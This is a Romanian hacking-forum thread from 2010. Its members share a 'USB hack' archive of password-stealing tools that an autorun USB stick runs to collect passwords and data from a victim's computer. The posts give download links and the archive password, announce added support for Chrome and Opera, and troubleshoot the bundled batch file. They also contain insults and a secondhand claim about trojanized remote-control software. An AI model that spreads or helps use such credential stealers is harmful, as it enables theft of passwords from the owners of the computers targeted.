cla1992 Posted May 9, 2010 Report Posted May 9, 2010 Downloadati acest fisier ca este mult mai complet si ofera mai multe date despre victima. L-am luat de pe hellsoft si am mai adaugat din alta parte unele stealere si am modificat in fisierul batch ca sa poata sa ruleze , sper ca va vor ajuta mult mai mult...bafta.Link: FileShare Download USB hack Mai complet.rarDaca mai aveti si voi puteti completa sa avem in final date cat mai multe despre calculatorul victimeiMars ba de'aici cu hellsoftu' ma-tii!! Quote
Scorpionadi Posted May 9, 2010 Report Posted May 9, 2010 Mars ba de'aici cu hellsoftu' ma-tii!!Ba da esti dobitoc ba? De ce ma injuri ma cretinule , eu doar am precizat sursa sa nu zica cineva ca am zis ca l-am facut eu.Cred ca tu ar trebui sa te duci in mortii ma-tii la oi si nu sa stai pe astfel de forumuri. Rog moderatorii sa imi scuze limbajul , dar nu am putut sa ma abtin la astfel de dobitoci Quote
nedo Posted May 16, 2010 Report Posted May 16, 2010 probabil a zis asta pentru ca o parte din programele de pe hellsoft ar fi virusate(nu stiu cat e de adevarata afirmatia pentru ca nu verifica acel site, totusi am vazut mai multe tutoriale legate de softuri chiar vandute de acel site care aveau viermi sau troieni in ele, unul din ele este control de la distanta versiunea 3, in momentul in care instalezi clientul automat se instaleaza si un server - server care in mod normal ar trebuii sa il dai victimei, si care vine cu executabil separat - care poate fi accesat cu clientul tocmai instalat dar pentru care iti trebuie si parola, aceasta insa nu o stia persoana care a facut tutorialul dar a incercat logarea la propria adresa ip cu clientul respectiv si a acceptat conexiuena dar nu a acceptat parola) Quote
Scorpionadi Posted May 16, 2010 Report Posted May 16, 2010 probabil a zis asta pentru ca o parte din programele de pe hellsoft ar fi virusate(nu stiu cat e de adevarata afirmatia pentru ca nu verifica acel site, totusi am vazut mai multe tutoriale legate de softuri chiar vandute de acel site care aveau viermi sau troieni in ele, unul din ele este control de la distanta versiunea 3, in momentul in care instalezi clientul automat se instaleaza si un server - server care in mod normal ar trebuii sa il dai victimei, si care vine cu executabil separat - care poate fi accesat cu clientul tocmai instalat dar pentru care iti trebuie si parola, aceasta insa nu o stia persoana care a facut tutorialul dar a incercat logarea la propria adresa ip cu clientul respectiv si a acceptat conexiuena dar nu a acceptat parola)Sunt perfect de acord cu tine, dar eu am testat aceste programe care sunt in arhiva uploadata de mine si nu este nimic periculos , sunt doar niste programe care fura parole din calculator cu ajutorul unui stick. Eu am spus ca am mai pus si altele in afara de cele puse de cel care a facut acele stealere , printre care sunt si cele puse de Cla1992 , doar ca acesta pus de mine este mai complet si poti afla mai multe parole si informatii din pc-ul victimei si m-am gandit sa nu mai deschid un topic separat pentru asta. In concluzie, nu cred ca trebuia sa ma jigneasca,din moment ce eu nu am jignit pe nimeni pe acest forum si eu nu am vrut decat sa ajut cum probabil faceti toti sau macar majoritatea de aici.P.S. Sper sa fie ultimul coment pe tema asta ca deja s-a lungit prea mult discutia si cred ca ceilalti s-au plictisit deja. Quote
Scorpionadi Posted May 19, 2010 Report Posted May 19, 2010 si pentru google chrome ? nu am timp acum ca sunt la serviciu , dar maine iti promit ca pun si pentru google chrome.PS. daca poate altcineva mai repede sa te ajute, ii multumim. Quote
Scorpionadi Posted May 20, 2010 Report Posted May 20, 2010 Acesta este ca cel de mai sus upluadat de mine , dar are ultimile versiuni ale programelor si in plus are si pentru Opera , Google Chrome si .... mai sunt cateva. Mult succes!Link: http://www.fileshare.ro/10795270371.9 Si apropo , este 100% fara virusi. Quote
Scorpionadi Posted September 30, 2010 Report Posted September 30, 2010 Poti baga arhiva in alta parte?Pe fileshare de fiecare data cand dau pe download ma duce mereu pe situri cu reclame...Incearca acum ca ar trebui sa mearga. Quote
mike_vio Posted September 30, 2010 Report Posted September 30, 2010 (edited) Pe windows Seven au dezactivat autorun-ul.Parola care e? - ca n-am fost pe faza. Ms. Edited September 30, 2010 by mike_vio Quote
Scorpionadi Posted October 1, 2010 Report Posted October 1, 2010 ma scuzati eram foarte obosit , parola este : "nircmd" , fara ghilimele Quote
adonisslanic Posted October 5, 2010 Report Posted October 5, 2010 Eroare. Titlu: 123 Continut: Command line syntax error. Type Command /? for Help. Eroarea imi apare cand dau autoplay la program Quote
mike_vio Posted October 6, 2010 Report Posted October 6, 2010 In fisierul .bat e ceva ce nu ii place. Poti executa manual fiecare comanda in "cmd" si vezi unde bubuie. Quote